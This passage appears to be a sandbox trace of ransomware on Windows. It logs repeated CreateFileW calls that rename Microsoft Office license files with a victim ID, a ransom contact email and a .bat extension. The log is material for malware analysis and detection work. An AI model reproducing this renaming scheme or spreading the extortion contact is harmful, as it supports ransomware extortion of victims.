office\\root\\licenses16\\o365proplusdemor_bypasstrial180-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.807] CloseHandle (hObject=0x434) returned 1 [0163.808] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.808] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.808] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Grace-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_grace-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.808] CloseHandle (hObject=0x434) returned 1 [0163.809] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.809] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.809] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Grace-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_grace-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.809] CloseHandle (hObject=0x434) returned 1 [0163.810] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.810] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.810] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.811] CloseHandle (hObject=0x434) returned 1 [0163.811] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.811] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.811] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.812] CloseHandle (hObject=0x434) returned 1 [0163.812] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.812] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.812] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription1-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription1-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.813] CloseHandle (hObject=0x434) returned 1 [0163.813] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.813] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.813] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.814] CloseHandle (hObject=0x434) returned 1 [0163.814] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.814] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.814] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.815] CloseHandle (hObject=0x434) returned 1 [0163.815] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.815] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.815] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.816] CloseHandle (hObject=0x434) returned 1 [0163.816] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.816] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.816] CloseHandle (hObject=0x434) returned 1 [0163.820] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.820] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.820] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.820] CloseHandle (hObject=0x434) returned 1 [0163.821] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.821] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.821] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription3-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription3-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.822] CloseHandle (hObject=0x434) returned 1 [0163.823] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.823] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.823] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.823] CloseHandle (hObject=0x434) returned 1 [0163.824] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.824] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.824] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.824] CloseHandle (hObject=0x434) returned 1 [0163.825] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.825] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription4-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription4-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.825] CloseHandle (hObject=0x434) returned 1 [0163.826] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.826] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.826] CloseHandle (hObject=0x434) returned 1 [0163.827] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.827] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.827] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.828] CloseHandle (hObject=0x434) returned 1 [0163.833] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.833] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_Subscription5-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subscription5-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.833] CloseHandle (hObject=0x434) returned 1 [0163.834] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.834] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.834] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.834] CloseHandle (hObject=0x434) returned 1 [0163.836] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.836] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.836] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.836] CloseHandle (hObject=0x434) returned 1 [0163.837] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.837] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.837] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial1-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial1-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.837] CloseHandle (hObject=0x434) returned 1 [0163.838] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.838] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.838] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.838] CloseHandle (hObject=0x434) returned 1 [0163.839] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.839] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.839] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.839] CloseHandle (hObject=0x434) returned 1 [0163.840] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.840] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.840] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial2-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial2-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.841] CloseHandle (hObject=0x434) returned 1 [0163.841] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.841] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.841] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.842] CloseHandle (hObject=0x434) returned 1 [0163.842] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.842] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.842] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.842] CloseHandle (hObject=0x434) returned 1 [0163.843] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.843] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.843] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial3-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial3-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.843] CloseHandle (hObject=0x434) returned 1 [0163.844] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.844] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.844] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.844] CloseHandle (hObject=0x434) returned 1 [0163.845] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.845] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.845] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.846] CloseHandle (hObject=0x434) returned 1 [0163.846] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.846] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.846] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial4-ul-oob.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial4-ul-oob.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.847] CloseHandle (hObject=0x434) returned 1 [0163.848] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.848] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.848] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-pl.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-pl.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0163.848] CloseHandle (hObject=0x434) returned 1 [0163.849] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.849] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x307fec0 | out: lpNewFilePointer=0x0) returned 1 [0163.849] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\O365ProPlusR_SubTrial5-ppd.xrm-ms.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\o365proplusr_subtrial5-ppd.xrm-ms.id-b4197730.[idecryptyourdata@cock.li].bat"), 